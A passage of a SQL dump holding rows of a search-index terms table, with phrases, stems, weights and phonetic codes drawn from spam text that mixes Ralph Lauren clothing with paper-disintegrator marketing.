media',0,1,1.3,'E530',1,'en'),(51328,'eye media and','ey media and',0,1,1.4333,'E5353',1,'en'),(51329,'eye media nsa','ey media nsa',0,1,1.4333,'E5352',1,'en'),(51330,'facility','facil',0,0,0.5333,'F243',1,'en'),(51331,'facility mens','facil mens',0,1,1.4333,'F24352',1,'en'),(51332,'facility mens polo','facil mens polo',0,1,1.6,'F2435214',1,'en'),(51333,'feed','feed',0,0,0.2667,'F300',1,'en'),(51334,'feed opening','feed opening',0,1,1.4,'F3152',1,'en'),(51335,'feed opening 10','feed opening 10',0,1,1.5,'F3152',1,'en'),(51336,'females long','femal long',0,1,1.4,'F542452',1,'en'),(51337,'females long sleeve','femal long sleeve',0,1,1.6333,'F54245241',1,'en'),(51338,'females size','femal size',0,1,1.4,'F542',1,'en'),(51339,'females size polo','femal size polo',0,1,1.5667,'F54214',1,'en'),(51340,'fit polo','fit polo',0,1,1.2667,'F314',1,'en'),(51341,'fit polo for','fit polo for',0,1,1.4,'F31416',1,'en'),(51342,'fit polo issue','fit polo issue',0,1,1.4667,'F3142',1,'en'),(51343,'fit store','fit store',0,1,1.3,'F3236',1,'en'),(51344,'fit store appropriate','fit store appropriate',0,1,1.7,'F323616163',1,'en'),(51345,'for boys','for boys',0,1,1.2667,'F612',1,'en'),(51346,'for boys solid','for boys solid',0,1,1.4667,'F61243',1,'en'),(51347,'for females','for females',0,1,1.3667,'F61542',1,'en'),(51348,'for females size','for females size',0,1,1.5333,'F61542',1,'en'),(51349,'for high','for high',0,1,1.2667,'F620',1,'en'),(51350,'for high security','for high security',0,1,1.5667,'F6263',1,'en'),(51351,'for men deterioration','for men deterioration',0,1,1.7,'F653635',1,'en'),(51352,'for men greater','for men greater',0,1,1.5,'F652636',1,'en'),(51353,'for men lbs','for men lbs',0,1,1.3667,'F65412',1,'en'),(51354,'for men non','for men non',0,1,1.3667,'F650',1,'en'),(51355,'for men sale','for men sale',0,1,1.4,'F6524',1,'en'),(51356,'for men what\'s','for men what',0,1,1.4667,'F6532',1,'en'),(51357,'for reasonable','for reasonable',0,1,1.4667,'F62514',1,'en'),(51358,'for reasonable per','for reasonable per',0,1,1.6,'F6251416',1,'en'),(51359,'for reasonable ralph','for reasonable ralph',0,1,1.6667,'F62514641',1,'en'),(51360,'for the polo','for the polo',0,1,1.4,'F6314',1,'en'),(51361,'for the wrecking','for the wrecking',0,1,1.5333,'F636252',1,'en'),(51362,'for this equiptment','for this equiptment',0,1,1.6333,'F6321353',1,'en'),(51363,'for wholesale','for wholesale',0,1,1.4333,'F6424',1,'en'),(51364,'for wholesale womens','for wholesale womens',0,1,1.6667,'F642452',1,'en'),(51365,'for women d','for women d',0,1,1.3667,'F653',1,'en'),(51366,'for women use','for women use',0,1,1.4333,'F652',1,'en'),(51367,'generates','gener',0,0,0.6,'G5632',1,'en'),(51368,'generates ralph','gener ralph',0,1,1.5,'G5632641',1,'en'),(51369,'generates ralph lauren','gener ralph lauren',0,1,1.7333,'G5632641465',1,'en'),(51370,'genuine light','genuin light',0,1,1.4333,'G5423',1,'en'),(51371,'genuine light mid','genuin light mid',0,1,1.5667,'G542353',1,'en'),(51372,'getting started','get started',0,1,1.5,'G352363',1,'en'),(51373,'girls ralph','girl ralph',0,1,1.3667,'G642641',1,'en'),(51374,'girls ralph lauren','girl ralph lauren',0,1,1.6,'G642641465',1,'en'),(51375,'greater spinning','greater spinning',0,1,1.5333,'G6362152',1,'en'),(51376,'greater spinning inertia','greater spinning inertia',0,1,1.8,'G6362152563',1,'en'),(51377,'growing than','grow than',0,1,1.4,'G65235',1,'en'),(51378,'growing than any','grow than any',0,1,1.5333,'G65235',1,'en'),(51379,'handbags hr','handbag hr',0,1,1.3667,'H53126',1,'en'),(51380,'handbags hr for','handbag hr for',0,1,1.5,'H5312616',1,'en'),(51381,'handle denser','handl denser',0,1,1.4333,'H5343526',1,'en'),(51382,'handle denser and','handl denser and',0,1,1.5667,'H534352653',1,'en'),(51383,'has polo','ha polo',0,1,1.2667,'H214',1,'en'),(51384,'has polo ralph','ha polo ralph',0,1,1.4667,'H214641',1,'en'),(51385,'high security','high security',0,1,1.4333,'H263',1,'en'),(51386,'high security and','high security and',0,1,1.5667,'H26353',1,'en'),(51387,'high volume','high volume',0,1,1.3667,'H2145',1,'en'),(51388,'high volume destruction','high volume destruction',0,1,1.7667,'H21453236235',1,'en'),(51389,'hold down','hold down',0,1,1.3,'H435',1,'en'),(51390,'hold down bolts','hold down bolts',0,1,1.5,'H4351432',1,'en'),(51391,'hooded sweatshirts womens','hood sweatshirts womens',0,1,1.8333,'H323263252',1,'en'),(51392,'hoodies outlet increased','hoodi outlet increased',0,1,1.8,'H3234352623',1,'en'),(51393,'hoodies particle','hoodi particle',0,1,1.5333,'H3216324',1,'en'),(51394,'hoodies particle sizes','hoodi particle sizes',0,1,1.7333,'H32163242',1,'en'),(51395,'hoodies standrad','hoodi standrad',0,1,1.5333,'H3235363',1,'en'),(51396,'hoodies standrad 3','hoodi standrad 3',0,1,1.6,'H3235363',1,'en'),(51397,'hoodies women been','hoodi women been',0,1,1.6,'H32515',1,'en'),(51398,'hoodies women this','hoodi women this',0,1,1.6,'H32532',1,'en'),(51399,'hr','hr',0,0,0.1333,'H600',1,'en'),(51400,'hr at','hr at',0,1,1.1667,'H630',1,'en'),(51401,'hr at nsa','hr at nsa',0,1,1.3,'H6352',1,'en'),(51402,'hr for','hr for',0,1,1.2,'H616',1,'en'),(51403,'hr for high','hr for high',0,1,1.3667,'H6162',1,'en'),(51404,'hr for reasonable','hr for reasonable',0,1,1.5667,'H6162514',1,'en'),(51405,'hr mens','hr mens',0,1,1.2333,'H652',1,'en'),(51406,'hr mens ralph','hr mens ralph',0,1,1.4333,'H652641',1,'en'),(51407,'hr trimming','hr trimming',0,1,1.3667,'H63652',1,'en'),(51408,'hr trimming system','hr trimming system',0,1,1.6,'H6365235',1,'en'),(51409,'hr wholesale','hr wholesale',0,1,1.4,'H6424',1,'en'),(51410,'hr wholesale ralph','hr wholesale ralph',0,1,1.6,'H6424641',1,'en'),(51411,'ideal for','ideal for',0,1,1.3,'I3416',1,'en'),(51412,'ideal for wholesale','ideal for wholesale',0,1,1.6333,'I3416424',1,'en'),(51413,'in jamaica','in jamaica',0,1,1.3333,'I5252',1,'en'),(51414,'in jamaica 12','in jamaica 12',0,1,1.4333,'I5252',1,'en'),(51415,'in more','in more',0,1,1.2333,'I560',1,'en'),(51416,'in more maximum','in more maximum',0,1,1.5,'I56525',1,'en'),(51417,'in ralph','in ralph',0,1,1.2667,'I5641',1,'en'),(51418,'in ralph lauren','in ralph lauren',0,1,1.5,'I5641465',1,'en'),(51419,'in stronger','in stronger',0,1,1.3667,'I5236526',1,'en'),(51420,'in stronger cutting','in stronger cutting',0,1,1.6333,'I52365262352',1,'en'),(51421,'in various','in various',0,1,1.3333,'I5162',1,'en'),(51422,'in various waste','in various waste',0,1,1.5333,'I51623',1,'en'),(51423,'increased','increas',0,0,0.6,'I52623',1,'en'),(51424,'increased cutting','increas cutting',0,1,1.5667,'I526232352',1,'en'),(51425,'increased cutting power','increas cutting power',0,1,1.7667,'I52623235216',1,'en'),(51426,'inertia','inertia',0,0,0.4667,'I563',1,'en'),(51427,'inertia resulting','inertia resulting',0,1,1.5667,'I563624352',1,'en'),(51428,'inertia resulting in','inertia resulting in',0,1,1.6667,'I5636243525',1,'en'),(51429,'introduced to','introduc to',0,1,1.4333,'I536323',1,'en'),(51430,'introduced to the','introduc to the',0,1,1.5667,'I536323',1,'en'),(51431,'is introduced','is introduced',0,1,1.4333,'I2536323',1,'en'),(51432,'is introduced to','is introduced to',0,1,1.5333,'I2536323',1,'en'),(51433,'issue today','issu today',0,1,1.3667,'I230',1,'en'),(51434,'issue today we','issu today we',0,1,1.4667,'I230',1,'en'),(51435,'italia an','italia an',0,1,1.3,'I345',1,'en'),(51436,'italia an overabundance','italia an overabundance',0,1,1.7667,'I3451615352',1,'en'),(51437,'italia usages','italia usages',0,1,1.4333,'I342',1,'en'),(51438,'italia usages along','italia usages along',0,1,1.6333,'I342452',1,'en'),(51439,'items sem','item sem',0,1,1.3,'I3525',1,'en'),(51440,'items sem coined','item sem coined',0,1,1.5333,'I3525253',1,'en'),(51441,'jackets duty','jacket duty',0,1,1.4,'J323',1,'en'),(51442,'jackets duty disintegrator','jacket duty disintegrator',0,1,1.8667,'J3232532636',1,'en'),(51443,'jamaica','jamaica',0,0,0.4667,'J520',1,'en'),(51444,'jamaica 12','jamaica 12',0,1,1.3333,'J520',1,'en'),(51445,'jewelry sale','jewelri sale',0,1,1.4,'J4624',1,'en'),(51446,'jewelry sale blade','jewelri sale blade',0,1,1.6,'J4624143',1,'en'),(51447,'key tape','kei tape',0,1,1.2667,'K310',1,'en'),(51448,'key tape ralph','kei tape ralph',0,1,1.4667,'K31641',1,'en'),(51449,'knife','knife',0,0,0.3333,'K510',1,'en'),(51450,'knife mill','knife mill',0,1,1.3333,'K5154',1,'en'),(51451,'knife mill techniques','knife mill techniques',0,1,1.7,'K51543252',1,'en'),(51452,'larger','larger',0,0,0.4,'L626',1,'en'),(51453,'larger volumes','larger volumes',0,1,1.4667,'L6261452',1,'en'),(51454,'larger volumes of','larger volumes of',0,1,1.5667,'L62614521',1,'en'),(51455,'lauren accessorie','lauren accessorie',0,1,1.5667,'L6526',1,'en'),(51456,'lauren accessorie by','lauren accessorie by',0,1,1.6667,'L65261',1,'en'),(51457,'lauren boys','lauren boys',0,1,1.3667,'L6512',1,'en'),(51458,'lauren boys exploitation','lauren boys exploitation',0,1,1.8,'L65121435',1,'en'),(51459,'lauren classic','lauren classic',0,1,1.4667,'L65242',1,'en'),(51460,'lauren classic fit','lauren classic fit',0,1,1.6,'L6524213',1,'en'),(51461,'lauren eye','lauren eye',0,1,1.3333,'L650',1,'en'),(51462,'lauren eye media','lauren eye media',0,1,1.5333,'L653',1,'en'),(51463,'lauren females','lauren females',0,1,1.4667,'L651542',1,'en'),(51464,'lauren females long','lauren females long',0,1,1.6333,'L651542452',1,'en'),(51465,'lauren italia an','lauren italia an',0,1,1.5333,'L65345',1,'en'),(51466,'lauren mens jackets','lauren mens jackets',0,1,1.6333,'L65232',1,'en'),(51467,'lauren pants','lauren pants',0,1,1.4,'L651532',1,'en'),(51468,'lauren pants sem','lauren pants sem',0,1,1.5333,'L6515325',1,'en'),(51469,'lauren polo a','lauren polo a',0,1,1.4333,'L6514',1,'en'),(51470,'lauren polo custom','lauren polo custom',0,1,1.6,'L6514235',1,'en'),(51471,'lauren polo jewelry','lauren polo jewelry',0,1,1.6333,'L6514246',1,'en'),(51472,'lauren polo up','lauren polo up',0,1,1.4667,'L65141',1,'en'),(51473,'lauren shorts for','lauren shorts for',0,1,1.5667,'L65263216',1,'en'),(51474,'lauren shorts sem','lauren shorts sem',0,1,1.5667,'L6526325',1,'en'),(51475,'lauren sweaters for','lauren sweaters for',0,1,1.6333,'L65236216',1,'en'),(51476,'lauren womens shirts','lauren womens shirts',0,1,1.6667,'L652632',1,'en'),(51477,'lbs','lb',0,0,0.2,'L120',1,'en'),(51478,'lbs by','lb by',0,1,1.2,'L121',1,'en'),(51479,'lbs by hr','lb by hr',0,1,1.3,'L1216',1,'en'),(51480,'lbs hr','lb hr',0,1,1.2,'L126',1,'en'),(51481,'lbs hr wholesale','lb hr wholesale',0,1,1.5333,'L126424',1,'en'),(51482,'lbs per','lb per',0,1,1.2333,'L1216',1,'en'),(51483,'lbs per hr','lb per hr',0,1,1.3333,'L1216',1,'en'),(51484,'lbs with','lb with',0,1,1.2667,'L123',1,'en'),(51485,'lbs with regard','lb with regard',0,1,1.5,'L1236263',1,'en'),(51486,'levels and','level and',0,1,1.3333,'L14253',1,'en'),(51487,'levels and minimal','level and minimal',0,1,1.6,'L1425354',1,'en'),(51488,'light mid','light mid',0,1,1.3,'L2353',1,'en'),(51489,'light mid ralph','light mid ralph',0,1,1.5,'L2353641',1,'en'),(51490,'lot of people','lot of people',0,1,1.4333,'L314',1,'en'),(51491,'marketing disintegrators','market disintegrators',0,1,1.8,'M62352325326362',1,'en'),(51492,'marketing disintegrators use','market disintegrators use',0,1,1.9333,'M62352325326362',1,'en'),(51493,'material when','materi when',0,1,1.4333,'M3645',1,'en'),(51494,'material when used','materi when used',0,1,1.6,'M364523',1,'en'),(51495,'maximum security','maximum security',0,1,1.5333,'M25263',1,'en'),(51496,'maximum security growing','maximum security growing',0,1,1.8,'M252632652',1,'en'),(51497,'media and girls','media and girls',0,1,1.5,'M3532642',1,'en'),(51498,'media nsa','media nsa',0,1,1.3,'M352',1,'en'),(51499,'media nsa css','media nsa css',0,1,1.4333,'M352',1,'en'),(51500,'media polo','media polo',0,1,1.3333,'M314',1,'en'),(51501,'media polo ralph','media polo ralph',0,1,1.5333,'M314641',1,'en'),(51502,'medium','medium',0,0,0.4,'M350',1,'en'),(51503,'medium volume','medium volume',0,1,1.4333,'M35145',1,'en'),(51504,'medium volume ralph','medium volume ralph',0,1,1.6333,'M35145641',1,'en'),(51505,'meet ralph','meet ralph',0,1,1.3333,'M3641',1,'en'),(51506,'meet ralph lauren','meet ralph lauren',0,1,1.5667,'M3641465',1,'en'),(51507,'men 04','men 04',0,1,1.2,'M000',1,'en'),(51508,'men 04 02','men 04 02',0,1,1.3,'M000',1,'en'),(51509,'men a single','men a single',0,1,1.4,'M2524',1,'en'),(51510,'men deterioration','men deterioration',0,1,1.5667,'M3635',1,'en'),(51511,'men deterioration of','men deterioration of',0,1,1.6667,'M36351',1,'en'),(51512,'men for this','men for this',0,1,1.4,'M1632',1,'en'),(51513,'men greater','men greater',0,1,1.3667,'M2636',1,'en'),(51514,'men greater spinning','men greater spinning',0,1,1.6667,'M26362152',1,'en'),(51515,'men high','men high',0,1,1.2667,'M200',1,'en'),(51516,'men high volume','men high volume',0,1,1.5,'M2145',1,'en'),(51517,'men lbs','men lbs',0,1,1.2333,'M412',1,'en'),(51518,'men lbs per','men lbs per',0,1,1.3667,'M41216',1,'en'),(51519,'men non','men non',0,1,1.2333,'M000',1,'en'),(51520,'men non classified','men non classified',0,1,1.6,'M24213',1,'en'),(51521,'men s sport','men s sport',0,1,1.3667,'M2163',1,'en'),(51522,'men sale','men sale',0,1,1.2667,'M240',1,'en'),(51523,'men sale a','men sale a',0,1,1.3333,'M240',1,'en'),(51524,'men what\'s','men what',0,1,1.3333,'M320',1,'en'),(51525,'men what\'s needed','men what needed',0,1,1.5667,'M3253',1,'en'),(51526,'mens hoodies standrad','men hoodies standrad',0,1,1.7,'M23235363',1,'en'),(51527,'mens jackets','men jackets',0,1,1.4,'M232',1,'en'),(51528,'mens jackets duty','men jackets duty',0,1,1.5667,'M2323',1,'en'),(51529,'mens shorts','men shorts',0,1,1.3667,'M2632',1,'en'),(51530,'mens shorts at','men shorts at',0,1,1.4667,'M26323',1,'en'),(51531,'mid ralph','mid ralph',0,1,1.3,'M3641',1,'en'),(51532,'mid ralph lauren','mid ralph lauren',0,1,1.5333,'M3641465',1,'en'),(51533,'mill techniques','mill techniques',0,1,1.5,'M43252',1,'en'),(51534,'mill techniques to','mill techniques to',0,1,1.6,'M432523',1,'en'),(51535,'minimal','minim',0,0,0.4667,'M400',1,'en'),(51536,'minimal mens','minim mens',0,1,1.4,'M452',1,'en'),(51537,'minimal mens ralph','minim mens ralph',0,1,1.6,'M452641',1,'en'),(51538,'model 3','model 3',0,1,1.2333,'M340',1,'en'),(51539,'model 3 disintegrator','model 3 disintegrator',0,1,1.7,'M3432532636',1,'en'),(51540,'monitor','monitor',0,0,0.4667,'M360',1,'en'),(51541,'monitor all','monitor all',0,1,1.3667,'M364',1,'en'),(51542,'monitor all sem','monitor all sem',0,1,1.5,'M36425',1,'en'),(51543,'more maximum','more maximum',0,1,1.4,'M6525',1,'en'),(51544,'more maximum security','more maximum security',0,1,1.7,'M6525263',1,'en'),(51545,'needed of','need of',0,1,1.3,'N310',1,'en'),(51546,'needed of ralph','need of ralph',0,1,1.5,'N31641',1,'en'),(51547,'non classified','non classified',0,1,1.4667,'N24213',1,'en'),(51548,'non classified ralph','non classified ralph',0,1,1.6667,'N24213641',1,'en'),(51549,'now polo','now polo',0,1,1.2667,'N140',1,'en'),(51550,'now polo ralph','now polo ralph',0,1,1.4667,'N14641',1,'en'),(51551,'nsa','nsa',0,0,0.2,'N200',1,'en'),(51552,'nsa approved','nsa approved',0,1,1.4,'N21613',1,'en'),(51553,'nsa approved 250','nsa approved 250',0,1,1.5333,'N21613',1,'en'),(51554,'nsa at','nsa at',0,1,1.2,'N230',1,'en'),(51555,'nsa at 250','nsa at 250',0,1,1.3333,'N230',1,'en'),(51556,'nsa authorized','nsa authorized',0,1,1.4667,'N23623',1,'en'),(51557,'nsa authorized levels','nsa authorized levels',0,1,1.7,'N236234142',1,'en'),(51558,'nsa css','nsa css',0,1,1.2333,'N200',1,'en'),(51559,'nsa css 02','nsa css 02',0,1,1.3333,'N200',1,'en'),(51560,'nsa css 04','nsa css 04',0,1,1.3333,'N200',1,'en'),(51561,'nsa css ralph','nsa css ralph',0,1,1.4333,'N2641',1,'en'),(51562,'nsa mens','nsa mens',0,1,1.2667,'N252',1,'en'),(51563,'nsa mens ralph','nsa mens ralph',0,1,1.4667,'N252641',1,'en'),(51564,'of boys','of boys',0,1,1.2333,'O120',1,'en'),(51565,'of boys ralph','of boys ralph',0,1,1.4333,'O12641',1,'en'),(51566,'of bulk','of bulk',0,1,1.2333,'O142',1,'en'),(51567,'of bulk material','of bulk material',0,1,1.5333,'O1425364',1,'en'),(51568,'of eye','of eye',0,1,1.2,'O100',1,'en'),(51569,'of eye media','of eye media',0,1,1.4,'O153',1,'en'),(51570,'of items','of items',0,1,1.2667,'O1352',1,'en'),(51571,'of items sem','of items sem',0,1,1.4,'O13525',1,'en'),(51572,'of paper','of paper',0,1,1.2667,'O160',1,'en'),(51573,'of paper mens','of paper mens',0,1,1.4333,'O1652',1,'en'),(51574,'of paper nsa','of paper nsa',0,1,1.4,'O1652',1,'en'),(51575,'of people wholesale','of people wholesale',0,1,1.6333,'O1424',1,'en'),(51576,'on book','on book',0,1,1.2333,'O512',1,'en'),(51577,'on book display','on book display',0,1,1.5,'O5123214',1,'en'),(51578,'opening 10','open 10',0,1,1.3333,'O152',1,'en'),(51579,'opening 10 x','open 10 x',0,1,1.4,'O152',1,'en'),(51580,'optimization','optim',0,0,0.8,'O135235',1,'en'),(51581,'optimization disintegrators','optim disintegrators',0,1,1.9,'O135235325326362',1,'en'),(51582,'organizations disintegrator','organ disintegrator',0,1,1.9,'O625235232532636',1,'en'),(51583,'organizations disintegrator over','organ disintegrator over',0,1,2,'O62523523253263616',1,'en'),(51584,'other company search','other company search',0,1,1.6667,'O362515262',1,'en'),(51585,'outlet a','outlet a',0,1,1.2667,'O343',1,'en'),(51586,'outlet a lot','outlet a lot',0,1,1.4,'O34343',1,'en'),(51587,'outlet increased','outlet increased',0,1,1.5333,'O34352623',1,'en'),(51588,'outlet increased cutting','outlet increased cutting',0,1,1.8,'O343526232352',1,'en'),(51589,'outlet space','outlet space',0,1,1.4,'O343212',1,'en'),(51590,'outlet space wishes','outlet space wishes',0,1,1.6333,'O343212',1,'en'),(51591,'over 40','over 40',0,1,1.2333,'O160',1,'en'),(51592,'over 40 cheap','over 40 cheap',0,1,1.4333,'O1621',1,'en'),(51593,'over 600','over 600',0,1,1.2667,'O160',1,'en'),(51594,'over 600 lbs','over 600 lbs',0,1,1.4,'O16412',1,'en'),(51595,'overabundance','overabund',0,0,0.8667,'O1615352',1,'en'),(51596,'overabundance units','overabund units',0,1,1.6333,'O1615352532',1,'en'),(51597,'overabundance units in','overabund units in',0,1,1.7333,'O16153525325',1,'en'),(51598,'pants sem','pant sem',0,1,1.3,'P5325',1,'en'),(51599,'pants sem model','pant sem model',0,1,1.5,'P532534',1,'en'),(51600,'paper','paper',0,0,0.3333,'P600',1,'en'),(51601,'paper mens','paper mens',0,1,1.3333,'P652',1,'en'),(51602,'paper mens polo','paper mens polo',0,1,1.5,'P65214',1,'en'),(51603,'paper nsa','paper nsa',0,1,1.3,'P652',1,'en'),(51604,'paper nsa css','paper nsa css',0,1,1.4333,'P652',1,'en'),(51605,'particle','particl',0,0,0.5333,'P6324',1,'en'),(51606,'particle ralph','particl ralph',0,1,1.4667,'P6324641',1,'en'),(51607,'particle ralph lauren','particl ralph lauren',0,1,1.7,'P6324641465',1,'en'),(51608,'particle sizes','particl sizes',0,1,1.4667,'P63242',1,'en'),(51609,'particle sizes rated','particl sizes rated',0,1,1.6667,'P6324263',1,'en'),(51610,'people wholesale','peopl wholesale',0,1,1.5333,'P424',1,'en'),(51611,'people wholesale polo','peopl wholesale polo',0,1,1.7,'P42414',1,'en'),(51612,'per cheap','per cheap',0,1,1.3,'P621',1,'en'),(51613,'per cheap ralph','per cheap ralph',0,1,1.5,'P621641',1,'en'),(51614,'per hr','per hr',0,1,1.2,'P600',1,'en'),(51615,'per hr at','per hr at',0,1,1.3,'P630',1,'en'),(51616,'per hr for','per hr for',0,1,1.3333,'P616',1,'en'),(51617,'per silverware','per silverware',0,1,1.4667,'P62416',1,'en'),(51618,'per silverware this','per silverware this',0,1,1.6333,'P6241632',1,'en'),(51619,'polo 3','polo 3',0,1,1.2,'P400',1,'en'),(51620,'polo 3 disintegrator','polo 3 disintegrator',0,1,1.6667,'P432532636',1,'en'),(51621,'polo a amount','polo a amount',0,1,1.4333,'P453',1,'en'),(51622,'polo custom','polo custom',0,1,1.3667,'P4235',1,'en'),(51623,'polo custom fit','polo custom fit',0,1,1.5,'P423513',1,'en'),(51624,'polo for boys','polo for boys',0,1,1.4333,'P41612',1,'en'),(51625,'polo for females','polo for females',0,1,1.5333,'P4161542',1,'en'),(51626,'polo handbags hr','polo handbags hr',0,1,1.5333,'P453126',1,'en'),(51627,'polo issue','polo issue',0,1,1.3333,'P420',1,'en'),(51628,'polo issue today','polo issue today',0,1,1.5333,'P423',1,'en'),(51629,'polo italia usages','polo italia usages',0,1,1.6,'P4342',1,'en'),(51630,'polo jewelry','polo jewelry',0,1,1.4,'P4246',1,'en'),(51631,'polo jewelry sale','polo jewelry sale',0,1,1.5667,'P424624',1,'en'),(51632,'polo men','polo men',0,1,1.2667,'P450',1,'en'),(51633,'polo men 04','polo men 04',0,1,1.3667,'P450',1,'en'),(51634,'polo mens shorts','polo mens shorts',0,1,1.5333,'P452632',1,'en'),(51635,'polo nsa','polo nsa',0,1,1.2667,'P452',1,'en'),(51636,'polo nsa at','polo nsa at',0,1,1.3667,'P4523',1,'en'),(51637,'polo scarves devastation','polo scarves devastation',0,1,1.8,'P4261231235',1,'en'),(51638,'polo shirts facility','polo shirts facility',0,1,1.6667,'P426321243',1,'en'),(51639,'polo shirts key','polo shirts key',0,1,1.5,'P42632',1,'en'),(51640,'polo shirts medium','polo shirts medium',0,1,1.6,'P42632535',1,'en'),(51641,'polo up','polo up',0,1,1.2333,'P410',1,'en'),(51642,'polo up to','polo up to',0,1,1.3333,'P413',1,'en'),(51643,'pounds','pound',0,0,0.4,'P532',1,'en'),(51644,'pounds per','pound per',0,1,1.3333,'P53216',1,'en'),(51645,'pounds per cheap','pound per cheap',0,1,1.5333,'P5321621',1,'en'),(51646,'pounds ralph','pound ralph',0,1,1.4,'P532641',1,'en'),(51647,'pounds ralph lauren','pound ralph lauren',0,1,1.6333,'P532641465',1,'en'),(51648,'power','power',0,0,0.3333,'P600',1,'en'),(51649,'power to','power to',0,1,1.2667,'P630',1,'en'),(51650,'power to handle','power to handle',0,1,1.5,'P63534',1,'en'),(51651,'prices womens','price womens',0,1,1.4333,'P6252',1,'en'),(51652,'prices womens ralph','price womens ralph',0,1,1.6333,'P6252641',1,'en'),(51653,'proven','proven',0,0,0.4,'P615',1,'en'),(51654,'proven rotary','proven rotary',0,1,1.4333,'P615636',1,'en'),(51655,'proven rotary knife','proven rotary knife',0,1,1.6333,'P615636251',1,'en'),(51656,'ralph lauren accessorie','ralph lauren accessorie',0,1,1.7667,'R4146526',1,'en'),(51657,'ralph lauren boys','ralph lauren boys',0,1,1.5667,'R4146512',1,'en'),(51658,'ralph lauren classic','ralph lauren classic',0,1,1.6667,'R41465242',1,'en'),(51659,'ralph lauren eye','ralph lauren eye',0,1,1.5333,'R41465',1,'en'),(51660,'ralph lauren females','ralph lauren females',0,1,1.6667,'R414651542',1,'en'),(51661,'ralph lauren pants','ralph lauren pants',0,1,1.6,'R414651532',1,'en'),(51662,'rated','rate',0,0,0.3333,'R300',1,'en'),(51663,'rated by','rate by',0,1,1.2667,'R310',1,'en'),(51664,'rated by the','rate by the',0,1,1.4,'R313',1,'en'),(51665,'reasonable per','reason per',0,1,1.4667,'R251416',1,'en'),(51666,'reasonable per hr','reason per hr',0,1,1.5667,'R251416',1,'en'),(51667,'reasonable ralph','reason ralph',0,1,1.5333,'R2514641',1,'en'),(51668,'reasonable ralph lauren','reason ralph lauren',0,1,1.7667,'R2514641465',1,'en'),(51669,'regard to hr','regard to hr',0,1,1.4,'R2636',1,'en'),(51670,'rendering','render',0,0,0.6,'R53652',1,'en'),(51671,'rendering ralph','render ralph',0,1,1.5,'R53652641',1,'en'),(51672,'rendering ralph lauren','render ralph lauren',0,1,1.7333,'R53652641465',1,'en'),(51673,'resulting in','result in',0,1,1.4,'R243525',1,'en'),(51674,'resulting in stronger','result in stronger',0,1,1.7,'R243525236526',1,'en'),(51675,'room size','room size',0,1,1.3,'R520',1,'en'),(51676,'room size ralph','room size ralph',0,1,1.5,'R52641',1,'en'),(51677,'rotary','rotari',0,0,0.4,'R360',1,'en'),(51678,'rotary knife','rotari knife',0,1,1.4,'R36251',1,'en'),(51679,'rotary knife mill','rotari knife mill',0,1,1.5667,'R3625154',1,'en'),(51680,'rotor','rotor',0,0,0.3333,'R360',1,'en'),(51681,'rotor 5','rotor 5',0,1,1.2333,'R360',1,'en'),(51682,'rotor 5 ralph','rotor 5 ralph',0,1,1.4333,'R3641',1,'en'),(51683,'rotors','rotor',0,0,0.4,'R362',1,'en'),(51684,'rotors with','rotor with',0,1,1.3667,'R3623',1,'en'),(51685,'rotors with 5','rotor with 5',0,1,1.4333,'R3623',1,'en'),(51686,'s hoodies particle','s hoodies particle',0,1,1.6,'S3216324',1,'en'),(51687,'s sandals in','s sandals in',0,1,1.4,'S53425',1,'en'),(51688,'sale a','sale a',0,1,1.2,'S400',1,'en'),(51689,'sale a genuine','sale a genuine',0,1,1.4667,'S425',1,'en'),(51690,'sale blade','sale blade',0,1,1.3333,'S4143',1,'en'),(51691,'sale blade cutting','sale blade cutting',0,1,1.6,'S41432352',1,'en'),(51692,'sandals in','sandal in',0,1,1.3333,'S53425',1,'en'),(51693,'sandals in jamaica','sandal in jamaica',0,1,1.6,'S53425252',1,'en'),(51694,'scarves devastation','scarv devastation',0,1,1.6333,'S61231235',1,'en'),(51695,'scarves devastation of','scarv devastation of',0,1,1.7333,'S612312351',1,'en'),(51696,'scarves store 600','scarv store 600',0,1,1.5667,'S61236',1,'en'),(51697,'screen is','screen is',0,1,1.3,'S652',1,'en'),(51698,'screen is introduced','screen is introduced',0,1,1.6667,'S652536323',1,'en'),(51699,'search engine','search engine',0,1,1.4333,'S62525',1,'en'),(51700,'search engine marketing','search engine marketing',0,1,1.7667,'S6252562352',1,'en'),(51701,'search engine optimization','search engine optimization',0,1,1.8667,'S62525135235',1,'en'),(51702,'security and','secur and',0,1,1.4,'S6353',1,'en'),(51703,'security and up','secur and up',0,1,1.5,'S63531',1,'en'),(51704,'security growing','secur growing',0,1,1.5333,'S632652',1,'en'),(51705,'security growing than','secur growing than',0,1,1.7,'S63265235',1,'en'),(51706,'sem','sem',0,0,0.2,'S500',1,'en'),(51707,'sem 3','sem 3',0,1,1.1667,'S500',1,'en'),(51708,'sem 3 disintegrator','sem 3 disintegrator',0,1,1.6333,'S532532636',1,'en'),(51709,'sem coined','sem coined',0,1,1.3333,'S5253',1,'en'),(51710,'sem coined organizations','sem coined organizations',0,1,1.8,'S52536252352',1,'en'),(51711,'sem disintegrators','sem disintegrators',0,1,1.6,'S5325326362',1,'en'),(51712,'sem disintegrators meet','sem disintegrators meet',0,1,1.7667,'S532532636253',1,'en'),(51713,'sem model','sem model',0,1,1.3,'S534',1,'en'),(51714,'sem model 3','sem model 3',0,1,1.3667,'S534',1,'en'),(51715,'shirt 1','shirt 1',0,1,1.2333,'S630',1,'en'),(51716,'shirt 1 particle','shirt 1 particle',0,1,1.5333,'S6316324',1,'en'),(51717,'shirt for women','shirt for women',0,1,1.5,'S63165',1,'en'),(51718,'shirt nsa','shirt nsa',0,1,1.3,'S6352',1,'en'),(51719,'shirt nsa approved','shirt nsa approved',0,1,1.6,'S63521613',1,'en'),(51720,'shirt women in','shirt women in',0,1,1.4667,'S635',1,'en'),(51721,'shirt women ralph','shirt women ralph',0,1,1.5667,'S635641',1,'en'),(51722,'shirts at','shirt at',0,1,1.3,'S6323',1,'en'),(51723,'shirts at 3','shirt at 3',0,1,1.3667,'S6323',1,'en'),(51724,'shirts cutting','shirt cutting',0,1,1.4667,'S632352',1,'en'),(51725,'shirts cutting chamber','shirt cutting chamber',0,1,1.7333,'S632352516',1,'en'),(51726,'shirts facility','shirt facility',0,1,1.5,'S6321243',1,'en'),(51727,'shirts facility mens','shirt facility mens',0,1,1.6667,'S632124352',1,'en'),(51728,'shirts key','shirt key',0,1,1.3333,'S632',1,'en'),(51729,'shirts key tape','shirt key tape',0,1,1.5,'S63231',1,'en'),(51730,'shirts medium','shirt medium',0,1,1.4333,'S632535',1,'en'),(51731,'shirts medium volume','shirt medium volume',0,1,1.6667,'S632535145',1,'en'),(51732,'shirts outlet a','shirt outlet 